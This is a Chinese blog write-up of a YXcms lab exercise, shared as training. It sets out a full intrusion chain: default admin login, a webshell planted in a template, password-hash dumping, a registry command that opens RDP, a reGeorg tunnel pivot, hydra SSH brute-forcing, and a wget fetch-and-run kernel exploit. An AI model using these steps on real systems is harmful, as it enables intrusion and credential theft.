靶场笔记-----YXcms靶场

最新推荐文章于 2023-07-14 11:15:06 发布
最新推荐文章于 2023-07-14 11:15:06 发布
阅读量1.2w 收藏 43
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zer0ooo/article/details/103190622
版权

前言:YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 后台地址请在网址后面加上/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。

实验环境:

windows 2003 + linux +kali
注:windows 2003 为外网,可以访问到物理机,网卡为nat3;
物理机访问----->192.168.100.130

下载地址:

https://pan.baidu.com/s/1xd8MdGwqZqErtvu0QO5d5A
提取码:xbb5

实验要求:

本环境共设置3个flag,在实验过程中不允许操作虚拟机

步骤详解:

1.如果看到是cms,先去搜集信息,百度一下该cms已出现的漏洞。我是根据这个网址发现的漏洞https://zhuanlan.zhihu.com/p/52099335
2.根据前言,在网址后面加上/index.php?r=admin
用户名:admin;密码:123456;
在这里插入图片描述
3.进入后台getshell
在管理首页----前台模板----最新默认模板2013-2-1----管理模板文件----index_index.php
编辑上传一句话木马
在这里插入图片描述在这里插入图片描述

保存退出!
4.测试,发现一句话木马上传成功。
在这里插入图片描述
5.上菜刀,获取更多权限。
在这里插入图片描述
6.右键----虚拟终端----whoami,发现是system用户,不用提权。
在这里插入图片描述
7.上传QuarksPwDump.exe,
在终端输入C:\phpStudy2013\WWW\QuarksPwDump.exe --dump-hash-local获取密码
在这里插入图片描述在这里插入图片描述

8.通过cmd5解码,账户名:Administrator 密码:Hallo(记住,下面会用到)
9.接下来尝试远程登录。
首先在终端输入netstat -ano,发现3389端口未开启。
开启3386端口命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
在这里插入图片描述

10.尝试远程登录。
在这里插入图片描述

11.通过上面破解的账号密码,远程登录
在这里插入图片描述

12.拿到flag1
在这里插入图片描述

13.进入外网后,收集有用信息。
结果发现xshell4新建会话有IP 和用户名。
14.尝试ping一下这个ip,可以ping通。
接下来尝试爆破密码。
通过菜刀往win2003上传reGeorg-master/tunnel.nosocker.php
物理机访问 http://192.168.100.130/tunnel.nosocher.php
在这里插入图片描述
15.接下来打开kali,运行reGeorg-master
在这里插入图片描述

16.编辑 /etc/proxychains.conf
socks5 127.0.0.1 8888
在这里插入图片描述在这里插入图片描述

17.python reGeorgSocksProxy.py -u http://192.168.100.130/tunnel.nosocher.php
在这里插入图片描述

18.尝试通过ssh访问内网。
proxychains ssh 172.16.1.1(成功)
在这里插入图片描述
19.设置字典
在这里插入图片描述

20.用hydra爆破密码
账号:admin
密码:123456
在这里插入图片描述
21.用xshell4连接172.16.1.1
在这里插入图片描述

22.History收集近期使用的命令,拿到flag2
在这里插入图片描述
23.Uname -a 查看系统版本
在这里插入图片描述
24.查看id,用户为admin
在这里插入图片描述
25.利用内核版本,上传exp提权
在这里插入图片描述
26.输入命令:
wget 172.16.1.2/exp1 - O exp1
ls -l
chmod 777 exp1
./exp1
cd /root/
拿到flag3!Bingo!
在这里插入图片描述

我ai记歌词
关注
  • 4
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
内网域渗透总结——红日靶场①_红日靶机账号密码
2401_83974590的博客
04-29 307
外网:192.168.43.17内网:192.168.52.143可以Ping通外网通192.168.52.138(win2008)通192.168.52.141(win2003)小皮必须是自带的,下载的新版本会导致kali机连接目标失败问题原理:自行理解内网两台不出网win互通win7开启phpstudywin11访问80端口得到phpstudy探针#发现开启了80,3306端口#访问发现80端口是php探针。
yxcms弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1966
yxcms弱口令至getshell 漏洞复现
YXcms建站系统版本1.2.7
05-14
摘要:PHP源码,企业建站,yxcms,php cms 如果你现在正在被各种大型建站系统繁琐的功能而困扰,如果您的网站虽然只用得上其中很小一部分功能却不得不安装一大堆东西,面对各种复杂操作的同时还要忍受因为体积庞大而带来的运行效率低下的问题。那么这一款cms应该更加适合你的需要。用最少的代码做更多的事情是Yxcms的设计理念。完成同样的工作Yxcms会用更简洁、人性的方式去实现。      YXcms建站系统 v1.2.7升级日志   1、修正:资讯栏目页关键词设置叠加   2、修正:资讯封面图bug   3、修正:拓展上传字段部分浏览器不能显示的问题   4、修正:同一内容对应多个url问
多节点靶场(1)--Yxcms靶场分析
u012335061的博客
11-22 2981
**** 多节点靶场(1)–Yxcms靶场分析** **链接: 任务:找找flag,一共有三个: 已经知道是yxcms,可以去网上看一下,这个cms爆出过什么漏洞,可以复现一下 Yxcms登录后台地址:http://192.168.100.130/index.php?r=admin/index/login Yxcms后台登录页面存在弱口令,默认用户密码是...
记录一次模拟内网渗透(一)
m0_63441547的博客
04-25 1475
这是一次有趣的内网渗透,作此文章仅是自己的学习笔记,还请各路神仙多多指点~kali攻击机ip:192.168.204.128web服务器外网ip:192.168.204.138web服务器内网ip:192.168.52.143域控主机ip:192.168.52.138域成员ip:192.168.52.141本次攻击的拓扑图此次实验就是拿下web服务器,域成员和域控服务器开搞开搞!!!!!!使用nmap扫描web服务器可以看到开放的端口。先访问80端口不错,挺多信息,但是没有找到漏洞点。
YXcms(mvc架构php的cms)简单学习与审计
热门推荐
Love&Share
04-05 1万+
YXcms(MVC) YXcms 1.4.7 熟悉MVC架构 路由方式 通过一个 r 的文件指针进行路由 参数传递 in($_GET[]) ...... public function test() { $param=in($_GET['a']); var_dump($param); } ...... $_GET 接收值,通过 in 进行过滤 in 函数 //数据过滤函数库 /* 功能:用来过滤字符串和字符串数组,防止被挂马和sql注入 参数$dat
yxcms存储型XSS至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1925
yxcms存储型XSS至getshell 漏洞复现
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
sqli-bypass靶场
11-10
"sqli-bypass靶场"显然是一个专门用于测试和学习SQL注入漏洞绕过技术的平台。在这个靶场中,你可能会遇到各种防御机制,如输入过滤、参数化查询、存储过程等,而你需要学习如何在这些防御下找到漏洞并实施有效的SQL...
cms.rar,靶机的源码
07-03
靶机源码
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
红日内网-红队评估(一)(上)
qq_46265010的博客
10-15 635
红日内网-红队评估(一)(上)
会话固定漏洞详解与YXcms会话固定漏洞复现
W小哥
05-21 1739
在日常的渗透测试工作中经常发现会话固定漏洞,但是由于实际危害较小,多数情况下并没有把该漏洞写进报告中 一、漏洞原理 漏洞的本质用一句话来说是把一个无效的或者说低权限的令牌提升为高权限的令牌,而这个令牌标识是攻击者可以控制的。利用漏洞攻击的整体流程。如下图。 攻击流程分为五个阶段: 1、攻击者请求 web 服务器生成会话令牌。(这一步不是必须的,因为有的服务器接受任意的会话令牌。) 2、web 服务器将令牌回复给攻击者。(这一步不是必须的,因为有的服务器接受任意的会话令牌。) 3、攻击者将与其当前令牌所关联
应急响应场景搭建
inslight的博客
09-21 1522
应急响应靶场搭建
yxcms登入后台
m0_74087268的博客
07-14 1528
首先下载yxcms的源代码链接:百度网盘 请输入提取码 提取码:3148 下载好之后将yxcms文件夹放到phpstudy的WWW文件目录下;打开phpstudy,选择网站->创建网站,域名可以写成yxcms,方便后续访问的记忆;端口可以填80或者其他端口,根目录选择浏览,选择刚才下载好的yxcms文件夹即可,PHP版本选5版本的就好,之后点击确认。(如果还有下载phpstudy的话可以看下我之前发的文章,里面有详细的教程介绍,链接:pikachu靶场的详细搭建_忆梦怀思的博客-CSDN博客)创建好yxcm
YXCMS的目录结构和模板文件介绍
chenzhiqi3645的博客
12-29 1477
yxcms现在被越来越多的网站建设爱好者使用,通俗点就是在网建程序猿里面比较火热了,这样大家的问题也就越来越多,而作为yxcms的忠实使用者,今天再来一次新手入门讲解:给大家把yxcms的程序目录结构和网站模板文件的作用讲解一下。如果是yxcms的“铁粉”的话可以自动忽略的。(以下介绍以yxc...
yxcms1.4.7版本审计sql注入-文件删除盲注配合dnslog解析数据
qq_29437513的博客
08-16 804
这是一篇cms审计内容,和之前做的文件包含+伪协议、反序列化入门内容不同,,拿项目练手。 我找了一下网上关于yxcms的漏洞,谷歌收录到1.4.6存在前台注入和后台文件删除盲注这两个洞,,对比发现1,4,7版本源码几乎相同。 下好1.4.7源码放到www目录下,访问进入了一个安装的页面 在找漏洞审计之前,登录后台关闭后登不上,提示站点账户锁定,这里折腾了很久,所以整个审计过程都不能关闭后台。 然后打开phpstorm开始审计源码: 这里我对phpstorm的操作不了解,看del函数这里 刚开始审计也不
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值